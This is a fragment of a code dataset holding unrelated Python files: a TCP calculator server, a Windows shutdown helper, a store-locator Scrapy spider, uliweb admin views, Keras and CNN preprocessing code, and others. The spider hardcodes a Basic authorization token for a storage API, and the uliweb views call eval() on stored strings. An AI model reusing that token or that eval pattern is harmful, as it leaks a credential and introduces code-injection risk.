[node]\n\n for n in nums:\n node = TreeNode(n)\n\n while stack and stack[-1].val < n:\n node.left = stack.pop()\n\n stack[-1].right = node\n stack.append(node)\n\n return stack[0].right\n","sub_path":"1. Problems/d. Stack & Queue/b. Monostack - Build Maximum Binary Tree.py","file_name":"b. Monostack - Build Maximum Binary Tree.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541937926","text":"import socket\nimport threading\nimport socketserver\nimport json\nimport time\nimport hashlib\nimport sys\n\n# Lock mechanism to deal with threads synchronization.\n# Controls access to critical sections during runtime.\nlock = threading.Lock()\n\n\n\"\"\" \nGLOBAL VARIABLES\nUsed to share information across all threads.\n\"\"\"\n\n# Store requests and provide access to its info to all threads.\nglobal request_list\nrequest_list = []\n\n# Deals with maximum delay that the clients will experience when requesting.\n# Used when there are not enough requests in a certain period, so that the server does not hang.\n# Provide access to its info to all threads.\nglobal first_request_time\nfirst_request_time = 0\n\n# Store which operation should be executed on a requests \"batch\".\nglobal operation_to_execute\noperation_to_execute = 0\n\n# Keeps track of how many responses was already sent to clients during a \"batch\".\n# Used to check if all clients that sent a request got a response from the server.\nglobal responses_sent\nresponses_sent = 0\n\n# Keeps track of how many requests were received by the server when there\n# are less than 5 requests within a certain period.\nglobal total_requests\ntotal_requests = 0\n\n# Store an execution hash that is generated from a timestamp (first_request_time).\n# This hash is used to provide a unique identification about a requests \"batch\" execution.\nglobal execution_hash\nexecution_hash = 0\n\nglobal results_vector\nresults_vector = []\n\nglobal results_calculated\nresults_calculated = 0\n\n\nclass ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):\n\n def handle(self):\n #cur_thread = threading.current_thread()\n #response = bytes(\"{}: {}\".format(cur_thread.name, data), 'ascii')\n\n global request_list\n global first_request_time\n global responses_sent\n global total_requests\n global execution_hash\n global results_vector\n global results_calculated\n\n if len(request_list) >= 5:\n print(\"[DEBUG] Server is busy processing a batch of 5 clients already\")\n self.request.sendall(\"SERVER IS BUSY\".encode(\"utf-8\"))\n return\n\n lock.acquire()\n if len(request_list) == 0:\n # start counting timeout\n first_request_time = time.time()\n # generate hash from timestamp for execution batch\n hash_object = hashlib.sha256(str(first_request_time).encode(\"utf-8\"))\n execution_hash = hash_object.hexdigest()\n #print(\"[DEBUG] hex_dig: {0}\".format(execution_hash))\n lock.release()\n\n # Load received client data\n data = str(self.request.recv(1024), 'ascii')\n\n # Load JSON data into python variables\n data_dict = json.loads(data)\n\n client_id = data_dict[\"client_id\"]\n request_code = data_dict[\"request_code\"] # which operation to execute (1:sum, 2:sub, 3:mult or 4:div)\n number_array = data_dict[\"number_array\"]\n number_1 = number_array[0]\n number_2 = number_array[1]\n timestamp = data_dict[\"timestamp\"]\n\n client_data = {\n \"client_address\": self.client_address[0],\n \"client_id\": client_id,\n \"request_code\": request_code,\n \"number_1\": number_1,\n \"number_2\": number_2,\n \"timestamp\": timestamp\n }\n\n # Add client request to request_list\n lock.acquire()\n request_list.append(client_data)\n lock.release()\n \n print(\"[DEBUG] request_list length: {0}\".format(len(request_list)))\n\n # wait while there has not been passed 5 seconds nor the server has received five requests whithin 5 seconds\n while(len(request_list) < 5):\n if (time.time() - first_request_time > 5):\n total_requests = len(request_list)\n print(\"[DEBUG] total_requests: {0}\".format(total_requests))\n break\n\n lock.acquire()\n if results_calculated == 0:\n self.check_operation_to_execute()\n lock.release()\n\n result = self.calculate(number_1, number_2)\n\n lock.acquire()\n results_calculated = results_calculated + 1\n results_vector.append(\n {\n \"client_id\":client_id,\n \"result\":result[1]\n })\n lock.release()\n\n print(\"[DEBUG] Server calculation response: {0}\".format(result))\n\n while(results_calculated < len(request_list)):\n print(\"[DEBUG] Waiting for all clients calculations to finish...\")\n\n response_dict = {\n \"execution_hash\":execution_hash,\n \"client_id\":client_id,\n \"operation_executed\":operation_to_execute,\n \"execution_status\":result[0],\n \"result\":result[1],\n \"all_clients_results\":results_vector,\n \"timestamp\":time.time()\n }\n \n response_json = json.dumps(response_dict)\n print(\"[DEBUG] Data that will be sent to clients: {0}\".format(response_json))\n\n # Send response to client\n self.request.sendall(response_json.encode(\"utf-8\"))\n\n lock.acquire()\n try:\n print(\"[DEBUG] Lock acquired\")\n responses_sent = responses_sent + 1\n except:\n print(\"[DEBUG] Error while locking resource\")\n finally:\n print(\"[DEBUG] Releasing lock\")\n lock.release()\n \n print(\"[DEBUG] responses_sent: {0}\".format(responses_sent))\n if responses_sent == total_requests or responses_sent >= 5:\n responses_sent = 0\n results_calculated = 0\n print(\"[DEBUG] Clearing results_vector\")\n results_vector.clear()\n print(\"[DEBUG] Clearing request_list\")\n request_list.clear()\n \n def check_operation_to_execute(self):\n # here we should develop a way to check which operation to execute\n # based on clients requests that are stored in <request_list> global variable\n global operation_to_execute\n\n operations_requested = {\n \"sum\":0,\n \"sub\":0,\n \"mult\":0,\n \"div\":0\n }\n\n # check for the most requested operation\n for request in request_list:\n if request[\"request_code\"] == 1:\n operations_requested[\"sum\"] = operations_requested[\"sum\"] + 1\n elif request[\"request_code\"] == 2:\n operations_requested[\"sub\"] = operations_requested[\"sub\"] + 1\n elif request[\"request_code\"] == 3:\n operations_requested[\"mult\"] = operations_requested[\"mult\"] + 1\n elif request[\"request_code\"] == 4:\n operations_requested[\"div\"] = operations_requested[\"div\"] + 1\n \n operation_to_execute = max(operations_requested, key=operations_requested.get)\n\n # solve draw problem (when there are two operations that are equally requested)...\n if len(request_list) >= 5 and operations_requested[operation_to_execute] < 3:\n operation_to_execute = \"draw\"\n else:\n operation_to_execute = max(operations_requested, key=operations_requested.get)\n \n print(\"[DEBUG] Operation to execute: {0}\".format(operation_to_execute))\n\n def server_sum(self, n1, n2):\n execution_status = 0 # response execution status, 0 = error, 1 = success\n result = 0 # calculation result\n\n try:\n result = float(n1) + float(n2)\n execution_status = 1\n except:\n print(\"[DEBUG] Server error while trying to sum\")\n result = 0\n execution_status = 0\n\n return (execution_status, result)\n \n def server_subtract(self, n1, n2):\n execution_status = 0\n result = 0\n\n try:\n result = float(n1) - float(n2)\n execution_status = 1\n except:\n print(\"[DEBUG] Server error while trying to subtract\")\n result = 0\n execution_status = 0\n\n return (execution_status, result)\n \n def server_multiply(self, n1, n2):\n execution_status = 0\n result = 0\n\n try:\n result = float(n1) * float(n2)\n execution_status = 1\n except:\n print(\"[DEBUG] Server error while trying to multiply\")\n result = 0\n execution_status = 0\n\n return (execution_status, result)\n \n def server_divide(self, n1, n2):\n execution_status = 0 \n result = 0\n\n try:\n result = float(n1) / float(n2)\n execution_status = 1\n except:\n print(\"[DEBUG] Server error while trying to divide\")\n result = 0\n execution_status = 0\n\n return (execution_status, result)\n \n def calculate(self, n1, n2):\n if operation_to_execute == \"sum\":\n print(\"[DEBUG] Server is going to execute SUM operation\")\n result = self.server_sum(n1, n2)\n\n elif operation_to_execute == \"sub\":\n print(\"[DEBUG] Server is going to execute SUB operation\")\n result = self.server_subtract(n1, n2)\n\n elif operation_to_execute == \"mult\":\n print(\"[DEBUG] Server is going to execute MULT operation\")\n result = self.server_multiply(n1, n2)\n\n elif operation_to_execute == \"div\":\n print(\"[DEBUG] Server is going to execute DIV operation\")\n result = self.server_divide(n1, n2)\n\n elif operation_to_execute == \"draw\":\n print(\"[DEBUG] Server verified that clients did not consent in operation to execute\")\n result = (0,0)\n\n else:\n print(\"[DEBUG] Server error while trying to decide which operation to execute\")\n result = (0,0)\n\n return result\n\n\nclass ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):\n pass\n\n\nif __name__ == \"__main__\":\n # Port 0 means to select an arbitrary unused port\n #HOST = \"localhost\"\n #PORT = 9999\n\n if len(sys.argv) < 2:\n print(\"[DEBUG] Error while parsing data from commando line.\")\n sys.exit(\"[X] IP or port not provided correctly! - Usage: python3 <script.py> <ip_address> <port>\");\n\n HOST = str(sys.argv[1])\n PORT = int(sys.argv[2])\n \n server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)\n\n with server:\n ip, port = server.server_address\n\n # Start a thread with the server -- that thread will then start one\n # more thread for each request\n server_thread = threading.Thread(target=server.serve_forever)\n\n # Exit the server thread when the main thread terminates\n server_thread.daemon = True\n server_thread.start()\n\n print(\"[DEBUG] Server loop running in thread:\", server_thread.name)\n\n while True:\n pass\n #server.shutdown()","sub_path":"mtserver.py","file_name":"mtserver.py","file_ext":"py","file_size_in_byte":10852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"498377705","text":"import csv\nimport datetime\nimport os\n\n\nwhile(1):\n #Defaults\n plu = input(\"What is the PLU? \")\n what = input(\"Description of the item \")\n howmuch = input(\"How much? \")\n who = input(\"Your numbers. Example 206430: \")\n when = input(\"What is the date \")\n\n #CSV Writer\n ofile = open('Whats_In_The_Container.csv', \"a\")\n writer = csv.writer(ofile, delimiter=',')\n writer.writerow([plu, what, howmuch, when, who])\n ofile.close()\n\n print()\n print()\n print()\n\n \n\n\n","sub_path":"WorkContainer/Container.py","file_name":"Container.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"188563123","text":"import win32security\nimport win32api\nimport sys\nfrom ntsecuritycon import *\n\n\ndef AdjustPrivilege(priv, enable = 1):\n # Get the process token.\n flags = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY\n htoken = win32security.OpenProcessToken(win32api.GetCurrentProcess(), flags)\n # Get the ID for the system shutdown privilege.\n id = win32security.LookupPrivilegeValue(None, priv)\n # Now obtain the privilege for this process.\n # Create a list of the privileges to be added.\n if enable:\n newPrivileges = [(id, SE_PRIVILEGE_ENABLED)]\n else:\n newPrivileges = [(id, 0)]\n # and make the adjustment.\n win32security.AdjustTokenPrivileges(htoken, 0, newPrivileges)\n\n\ndef go_shutdown(is_reboot=0):\n AdjustPrivilege(SE_SHUTDOWN_NAME)\n win32api.InitiateSystemShutdown(None, 'Shutdown msg from API Server', 10, 1, is_reboot)\n\n\nif __name__ == '__main__':\n go_shutdown()\n","sub_path":"agent/winvm/shutdown.py","file_name":"shutdown.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370750614","text":"from osgeo import osr, gdal\nimport sys\nimport pyproj\n\ndef printnn(line):\n print(\"\\r\\n{}\".format(line))\n\ndef show_crs(fname):\n print(fname)\n ds = gdal.Open(fname)\n old_cs= osr.SpatialReference()\n proj_str = ds.GetProjectionRef()\n old_cs.ImportFromWkt(proj_str)\n printnn(old_cs)\n cs = pyproj.CRS.from_string(proj_str)\n printnn(\"EPSG:{}\".format(cs.to_epsg()))\n\nif __name__ ==\"__main__\":\n fname='/home/tony/changed/h28/83.tif'\n if len(sys.argv)>1:\n fname = sys.argv[1]\n show_crs(fname)","sub_path":"crs.py","file_name":"crs.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159275682","text":"#coding=utf-8\nfrom uliweb import expose, functions\nfrom uliweb.i18n import ugettext_lazy as _\nimport logging\n\nlog = logging.getLogger(__name__)\n\ndef __begin__():\n functions.require_login()\n\n@expose('/admin/models_config')\nclass AdminModelsConfigView(object):\n \"\"\"\n Model administration config app\n \"\"\"\n\n def __init__(self):\n self.model = functions.get_model('model_config')\n self.model_his = functions.get_model('model_config_his')\n\n @expose('')\n def index(self):\n fields = [\n {'name':'display_name', 'width':200},\n {'name':'model_name', 'width':200},\n {'name':'is_published', 'verbose_name':_('Is Published'), 'width':100},\n 'description',\n {'name':'published_time', 'width':150},\n {'name':'action', 'verbose_name':_('Action'), 'width':120}\n ]\n\n def _action(value, obj):\n from uliweb.core.html import Tag\n\n actions = [\n Tag('a', '<i class=\"fa fa-eye\"></i>', title=_('View'),\n href=url_for(self.__class__.view, model_name=obj.model_name),\n _class=\"btn btn-xs btn-primary\"),\n Tag('a', '<i class=\"fa fa-remove\"></i>', title=_('Delete'),\n href=url_for(self.__class__.delete, model_name=obj.model_name),\n _class=\"btn btn-xs btn-danger action-delete\"),\n\n ]\n if obj.uuid:\n actions.insert(1, Tag('a', '<i class=\"fa fa-toggle-off\"></i>', title=_('Unpublish'),\n href=url_for(self.__class__.unpublish, model_name=obj.model_name),\n _class=\"btn btn-xs btn-warning action-unpublish\"))\n return ' '.join(map(str, actions))\n\n def _is_published(value, obj):\n if obj.uuid:\n return '<i class=\"fa fa-check-square-o\"></i> (%s)' % obj.uuid\n else:\n return '<i class=\"fa fa-square-o\"></i>'\n\n fields_convert_map = {'action':_action, 'is_published':_is_published}\n\n view =functions.ListView(self.model, fields=fields,\n fields_convert_map=fields_convert_map)\n objects = view.objects()\n return {'view':view, 'objects':objects, 'total':view.total}\n\n def add(self):\n from forms import AddForm\n\n fields = ['model_name', 'display_name', 'table_name', 'description',\n 'basemodel', 'has_extension', 'extension_model']\n\n def post_created_form(fcls, model):\n from uliweb.form.widgets import Button\n\n fcls.layout_class = 'bs3t'\n fcls.form_buttons = [\n str(Button(value=_('Save'), _class=\"btn btn-primary btn-sm\",\n name=\"submit\", type=\"submit\")),\n ]\n\n def pre_save(data):\n from uliweb.utils.common import get_uuid, import_attr\n from uliweb.contrib.model_config import get_model_fields, get_model_indexes\n\n data['uuid'] = get_uuid()[:6]\n if not data['table_name']:\n data['table_name'] = data['model_name'].lower()\n\n if not data['display_name']:\n data['display_name'] = data['model_name']\n\n #add import basemodel support\n if data['basemodel']:\n BM = import_attr(data['basemodel'])\n data['fields'] = get_model_fields(BM)\n data['indexes'] = get_model_indexes(BM)\n\n if data['extension_model']:\n EM = import_attr(data['extension_model'])\n data['extension_fields'] = get_model_fields(EM)\n data['extension_indexes'] = get_model_indexes(EM)\n\n def post_save(obj, data):\n r = self.model(model_name=obj.model_name,\n display_name=obj.display_name,\n description=obj.description,\n modified_user=request.user.id)\n r.save(version=True)\n\n\n view = functions.AddView(self.model_his, ok_url=url_for(self.__class__.index),\n post_created_form=post_created_form,\n form_cls=AddForm,\n pre_save=pre_save,\n post_save=post_save,\n fields=fields, version=True)\n return view.run()\n\n def _get_model(self, model_name, uuid):\n return self.model_his.get((self.model_his.c.model_name==model_name) &\n (self.model_his.c.uuid==uuid))\n\n def view(self, model_name):\n model = self.model.get(self.model.c.model_name==model_name)\n\n uuid = request.GET.get('uuid')\n uuids = [row.uuid for row in\n self.model_his.filter(self.model_his.c.model_name==model_name)\\\n .fields(self.model_his.c.uuid)\\\n .order_by(self.model_his.c.create_time.desc())]\n\n obj = None\n if not uuid and len(uuids)>0:\n uuid = uuids[0]\n\n if uuid in uuids:\n obj = self._get_model(model_name, uuid)\n\n template_data = {'uuids':uuids, 'model_name':model_name,\n 'uuid':uuid, 'object':obj, 'published_uuid':model.uuid if model else ''}\n if obj:\n template_data['columns'] = eval(obj.fields or '[]')\n template_data['indexes'] = eval(obj.indexes or '[]')\n template_data['extension_columns'] = eval(obj.extension_fields or '[]')\n template_data['extension_indexes'] = eval(obj.extension_indexes or '[]')\n fields = ['model_name', 'display_name', 'table_name', 'basemodel', 'has_extension', 'extension_model']\n view = functions.DetailView(self.model_his, obj=obj, fields=fields,\n template_data=template_data)\n return view.run()\n else:\n template_data['view'] = ''\n template_data['columns'] = []\n template_data['indexes'] = []\n template_data['extension_columns'] = []\n template_data['extension_indexes'] = []\n return template_data\n\n def save(self, model_name):\n import json as JSON\n from uliweb.utils.common import get_uuid\n\n column_name = request.GET.get('column_name')\n column = JSON.loads(request.POST[column_name])\n uuid = request.GET.get('uuid')\n action = request.GET.get('action')\n\n obj = self._get_model(model_name, uuid)\n old_column = getattr(obj, column_name)\n\n list_columns = column_name in ('fields', 'indexes', 'extension_fields',\n 'extension_indexes')\n if list_columns:\n old_column = eval(old_column or '[]')\n\n index = -1\n if action in ('edit', 'delete'):\n for x in range(len(old_column)):\n if old_column[x]['name'] == column['name']:\n index = x\n break\n\n if index >= 0:\n reserved = old_column[index].pop('_reserved', False)\n else:\n reserved = None\n\n if action in ('add', 'delete') or (index>=0 and old_column[index] != column):\n #if not published, then directly use current record\n if obj.status == '1':\n data = obj.to_dict()\n data.pop('id')\n data.pop('create_time')\n data['status'] = '0'\n obj = self.model_his(**data)\n obj.uuid = get_uuid()[:6]\n\n if list_columns:\n if action == 'add':\n old_column.append(column)\n elif action == 'edit':\n column['_reserved'] = reserved\n old_column[index] = column\n else:\n del old_column[index]\n else:\n old_column = column\n\n setattr(obj, column_name, old_column)\n obj.save(version=True)\n uuid = obj.uuid\n return json({'success':True, 'message':'Success!', 'data':{'uuid':uuid}})\n\n def publish(self, model_name):\n from uliweb.utils import date\n from uliweb.orm import Begin, Commit, Rollback\n\n Begin()\n uuid = request.GET.get('uuid')\n obj = self._get_model(model_name, uuid)\n if not obj:\n return json({'success':False, 'message':\"Model %s(%s) can't be found\" % (model_name, uuid)})\n obj.status = '1'\n obj.published_time = date.now()\n if len(obj.extension_fields) > 0:\n obj.has_extension = True\n obj.save(version=True)\n\n row = self.model.get(self.model.c.model_name==model_name)\n row.uuid = uuid\n row.published_time = date.now()\n row.modified_user = request.user.id\n row.modified_time = obj.published_time\n row.display_name = obj.display_name\n row.description = obj.description\n row.save(version=True)\n\n try:\n M = functions.get_model(model_name)\n M.migrate()\n if obj.has_extension:\n M.ext._model.migrate()\n Commit()\n\n except Exception as e:\n Rollback()\n log.exception(e)\n return json({'success':False, 'message':'Migrate Model %s(%s) Failed!' % (model_name, uuid)})\n return json({'success':True, 'message':'Model %s(%s) has been published successfully!' % (model_name, uuid)})\n\n def unpublish(self, model_name):\n count = self.model_his.filter(self.model_his.c.model_name==model_name).count()\n if count <= 1:\n return json({'success':False, 'message':'There should be at lastest one version existed'})\n row = self.model.get(self.model.c.model_name==model_name)\n row.uuid = ''\n row.published_time = None\n row.save(version=True)\n return json({'success':True})\n\n def delete(self, model_name):\n row = self.model.get(self.model.c.model_name==model_name)\n row.delete()\n\n for obj in self.model_his.filter(self.model_his.c.model_name==model_name):\n obj.delete()\n return json({'success':True})\n\n def delete_version(self, model_name):\n uuid = request.GET.get('uuid')\n row = self.model.get(self.model.c.model_name==model_name)\n\n version = self._get_model(model_name, uuid)\n if version.uuid != row.uuid:\n version.delete()\n else:\n return json({'success':False, 'message':\"You can't delete published version\"})\n\n return json({'success':True})","sub_path":"uliweb_peafowl/admin_models_config/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"9540705","text":"# -*- coding: utf-8 -*-\nfrom howard_birnbaum.items import HowardBirnbaumItem\nimport scrapy\nimport json\nimport requests\nimport xmltodict\nfrom pyquery import PyQuery\n\n\nclass eldoradostone(scrapy.Spider):\n name=\"eldoradostone\"\n all_urls = []\n scraped_country = ''\n def __init__(self, country = '', *args,**kwargs):\n\n url = \"https://storage.scrapinghub.com/collections/293632/s/latlong\"\n \n headers = {\n 'content-type': \"application/json\",\n 'authorization': \"Basic ZWE3NmIwMzcxMGU3NDVlOGI2YWIxYTg2MGFiMjcxOGU6\"\n }\n \n response = requests.request(\"GET\", url, headers=headers).json()\n\n for i in response['value']:\n self.all_urls.append(i)\n\n\n \n \n\n def start_requests(self):\n for url in self.all_urls:\n url1 = url.split('$')\n req_url = \"http://www.eldoradostone.com/wp-admin/admin-ajax.php?action=store_search&lat={}&lng={}&max_results=100&search_radius=25\".format(str(url1[1]),str(url1[2]))\n yield scrapy.Request(url=req_url, callback=self.parse)\n \n \n def parse(self, response):\n \n r = json.loads(response.body_as_unicode())\n \n for m in r:\n item = HowardBirnbaumItem()\n try:\n item['company'] = m['store']\n except Exception as e:\n print (e)\n try:\n item['address'] = m['address']+' '+m['address2']\n except Exception as e:\n print (e) \n try:\n item['state'] = m['state']\n except Exception as e:\n print (e) \n try:\n item['country'] = m['country']\n except Exception as e:\n print (e) \n try:\n item['phone_number'] = m['phone']\n except Exception as e:\n print (e) \n try:\n item['web_site_url'] = m['url']\n except Exception as e:\n print (e) \n try:\n item['email'] = m['email']\n except Exception as e:\n print (e) \n try:\n item['city'] = m['city']\n except Exception as e:\n print (e)\n try:\n item['postal_code'] = m['zip']\n except Exception as e:\n print (e) \n \n yield item\n \n\n ","sub_path":"Howard_Birnbaum/howard_birnbaum/build/lib/howard_birnbaum/spiders/eldoradostone.py","file_name":"eldoradostone.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"523333886","text":"# Takes a 1 character number string and returns the factorial\ndef simpleFact(n):\n\tif (n == '9'):\n\t\treturn 362880\n\tif (n == '8'):\n\t\treturn 40320\n\tif (n == '7'):\n\t\treturn 5040\n\tif (n == '6'):\n\t\treturn 720\n\tif (n == '5'):\n\t\treturn 120\n\tif (n == '4'):\n\t\treturn 24\n\tif (n == '3'):\n\t\treturn 6\n\tif (n == '2'):\n\t\treturn 2\n\telse:\n\t\treturn 1\n\n\ndef factorial(n):\n\tfact = 1\n\twhile (n > 0):\n\t\tfact *= n\n\t\tn -= 1\n\treturn fact\n\ndef sumFactDigits(n):\n\tn = str(n)\n\ttotal = 0\n\tfor x in range(len(n)):\n\t\ttotal += simpleFact(n[x])\n\treturn total\n\n","sub_path":"Euler/P34 Sum Factorial Digits/p34.py","file_name":"p34.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"232508530","text":"from cluster.preprocess.pre_node_feed import PreNodeFeed\nfrom master.workflow.preprocess.workflow_feed_fr2wcnn import WorkflowFeedFr2Wcnn\nimport pandas as pd\nimport warnings\nimport numpy as np\nfrom konlpy.tag import Mecab\nfrom common.utils import *\n\nclass PreNodeFeedFr2Wcnn(PreNodeFeed):\n \"\"\"\n\n \"\"\"\n\n def run(self, conf_data):\n \"\"\"\n override init class\n \"\"\"\n super(PreNodeFeedFr2Wcnn, self).run(conf_data)\n self._init_node_parm(conf_data['node_id'])\n\n def _get_node_parm(self, node_id):\n \"\"\"\n return conf master class\n :return:\n \"\"\"\n return WorkflowFeedFr2Wcnn(node_id)\n\n def _init_node_parm(self, node_id):\n \"\"\"\n\n :param node_id:\n :return:\n \"\"\"\n try:\n wf_conf = WorkflowFeedFr2Wcnn(node_id)\n self.wf_conf = wf_conf\n self.encode_channel = wf_conf.get_encode_channel\n self.encode_col = wf_conf.get_encode_column\n self.encode_len = wf_conf.get_encode_len\n self.decode_col = wf_conf.get_decode_column\n self.lable_size = wf_conf.get_lable_size\n self.char_embed = wf_conf.char_encode\n self.char_max_len = wf_conf.char_max_len\n self.lable_onehot = OneHotEncoder(self.lable_size)\n if (wf_conf.get_lable_list):\n self.lable_onehot.restore(wf_conf.get_lable_list)\n self.preprocess_type = wf_conf.get_preprocess_type\n self.embed_type = wf_conf.get_embed_type\n self.vocab_size = wf_conf.get_vocab_size + 4\n self.char_embed_size = 160\n if (self.char_embed == True) :\n self.word_vector_size = self.vocab_size + (self.char_embed_size * self.char_max_len)\n else :\n self.word_vector_size = self.vocab_size\n if(self.embed_type == 'onehot') :\n self.input_onehot = OneHotEncoder(self.vocab_size)\n if (wf_conf.get_vocab_list):\n self.input_onehot.restore(wf_conf.get_vocab_list)\n except Exception as e:\n raise Exception(e)\n\n def _convert_data_format(self, file_path, index):\n \"\"\"\n\n :param obj:\n :param index:\n :return:\n \"\"\"\n try :\n store = pd.HDFStore(file_path)\n chunk = store.select('table1',\n start=index.start,\n stop=index.stop)\n count = index.stop - index.start\n if(self.encode_col in chunk and self.decode_col in chunk) :\n words = self.encode_pad(self._preprocess(chunk[self.encode_col].values)[0:count], max_len=self.encode_len)\n encode = self._word_embed_data(self.embed_type, words, cls=self.input_onehot)\n encode = np.array(encode).reshape([-1, self.encode_len, self.vocab_size])\n if (self.char_embed == True):\n encode = self._concat_char_vector(encode, words)\n encode = np.array(encode).reshape([-1, self.encode_len, self.word_vector_size, self.encode_channel])\n decode = np.array(chunk[self.decode_col].values).reshape([-1,1]).tolist()\n return encode, self._word_embed_data(self.embed_type, decode, cls=self.lable_onehot)\n else :\n raise Exception (\"WCNN Data convert error : no column name exists\")\n except Exception as e :\n raise Exception (e)\n finally:\n store.close()\n\n def _concat_char_vector(self, encode, words):\n \"\"\"\n concat word embedding vecotr and char level embedding\n :param encode : word vector list\n :param words : word list\n :return: concat vector\n \"\"\"\n return_encode = np.array([])\n for i, vec_list, word_list in zip(range(len(encode)), encode, words) :\n for j, vec, word in zip(range(len(vec_list)), vec_list, word_list) :\n word = word[:self.char_max_len-1] if len(word) > self.char_max_len else word\n pad_len = (self.char_max_len - len(word))\n return_encode = np.append(return_encode,\n np.concatenate([vec,\n np.array(self.get_onehot_vector(word)).reshape([len(word) * self.char_embed_size]),\n np.zeros([pad_len * self.char_embed_size])]))\n return return_encode\n\n\n\n def _preprocess(self, input_data):\n \"\"\"\n\n :param input_data:\n :return:\n \"\"\"\n if(self.preprocess_type == 'mecab') :\n return self._mecab_parse(input_data)\n elif (self.preprocess_type == 'kkma'):\n return self._mecab_parse(input_data)\n elif (self.preprocess_type == 'twitter'):\n return self._mecab_parse(input_data)\n else :\n return list(map(lambda x : x.split(' '), input_data.tolist()))\n\n def data_size(self):\n \"\"\"\n get data array size of this calss\n :return:\n \"\"\"\n try :\n store = pd.HDFStore(self.input_paths[self.pointer])\n table_data = store.select('table1')\n return table_data[table_data.columns.values[0]].count()\n except Exception as e :\n raise Exception (e)\n finally:\n store.close()\n\n def has_next(self):\n \"\"\"\n check if hdf5 file pointer has next\n :return:\n \"\"\"\n if(len(self.input_paths) > self.pointer) :\n return True\n else :\n self.wf_conf.set_lable_list(self.lable_onehot.dics())\n self.wf_conf.set_word_vector_size(self.word_vector_size)\n if (self.embed_type == 'onehot'):\n self.wf_conf.set_vocab_list(self.input_onehot.dics())\n return False\n","sub_path":"cluster/preprocess/pre_node_feed_fr2wcnn.py","file_name":"pre_node_feed_fr2wcnn.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"23711411","text":"# coding=utf-8\r\nimport numpy as np\r\nimport math\r\nimport keras as kr\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nfrom ann_visualizer.visualize import ann_viz\r\n\r\ndef randomcolor(): \r\n colorArr = ['1','2','3','4','5','6','7','8','9','A','B','C','D','E','F'] \r\n color = \"\" \r\n for i in range(6): \r\n color += colorArr[random.randint(0,14)] \r\n return \"#\"+color\r\n\r\n\r\ndef pl(st,r):\r\n plt.figure(st)\r\n r1los = r[r[3].isin([st])].values\r\n rmse=np.sqrt(np.power(r1los[:, -2]-r1los[:, -1],2).sum()/r1los.shape[0])\r\n plt.plot(r1los[:, 0], r1los[:, -1], randomcolor(),label = 'predict')\r\n plt.plot(r1los[:, 0], r1los[:, -2], randomcolor(),label='raw')\r\n plt.legend()\r\n plt.title(st+'rmse ='+str(rmse))\r\n plt.show()\r\n\r\n\r\nclass NN(object):\r\n model = []\r\n history=[]\r\n\r\n def __init__(self, layers):\r\n self.model = Sequential()\r\n self.model.add(Dense(layers[1][0], activation=layers[1][1], input_dim=layers[0][0]))\r\n #kr.initializers.RandomUniform(minval=init_weight[0], maxval=init_weight[1], seed=None)\r\n kr.layers.ELU(alpha=0.1)\r\n kr.layers.ReLU(negative_slope=0.1)\r\n for i in range(2, len(layers)):\r\n self.model.add(Dense(layers[i][0], activation=layers[i][1]))\r\n\r\n def fit(self, X, Y, learning_rate=0.1, epochs=2, solver=\"Adam\", momentum=1):\r\n if solver == \"SGD\":\r\n solver = kr.optimizers.SGD(\r\n lr=learning_rate)\r\n elif solver == \"Adam\":\r\n solver = kr.optimizers.Adam(\r\n lr=learning_rate)\r\n self.model.compile(optimizer=solver, loss='mean_squared_error') #'mean_squared_error'\r\n history=self.LossHistory()\r\n self.model.fit(X, Y, epochs=epochs,verbose=0,callbacks=[history])\r\n self.history=history\r\n\r\n def predict(self, X):\r\n X = np.array(X)\r\n pr = self.model.predict(X)\r\n return pr\r\n\r\n def loss(self):\r\n return self.history.losses\r\n\r\n class LossHistory(kr.callbacks.Callback):\r\n def on_train_begin(self, logs={}):\r\n self.losses = []\r\n\r\n def on_batch_end(self, batch, logs={}):\r\n self.losses.append(logs.get('loss'))\r\n\r\n def visual(self,tit):\r\n ann_viz(self.model,title=tit,filename=tit+'.dot',view=False)","sub_path":"mxnn.py","file_name":"mxnn.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"639239356","text":"import pandas as pd\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\r\nimport sys, argparse\r\n\r\nnp.set_printoptions(precision=4) # Print only four digits\r\n\r\n'''\r\n Author: Samuel Prevost\r\n Date: 22/02/2018 14:22:53 UTC+1\r\n Title: Automatic Linear Discriminant Analysis\r\n Desc:\r\n - Aim of LDA: project a feature space (a dataset n-dimensional samples) onto a smaller subspace k (k <= n-1)\r\n while maintaining the class-discriminatory information.\r\n - LDA requires knowing the classes of the samples\r\n - It can be good to first reduce the dimension using PCA, then project by class using LDA\r\n Main source: http://sebastianraschka.com/Articles/2014_python_lda.html\r\n'''\r\n\r\n\r\ndef main(argv):\r\n ## ------- WELCOMING C.L.I. ------- ## \r\n parser = argparse.ArgumentParser()\r\n 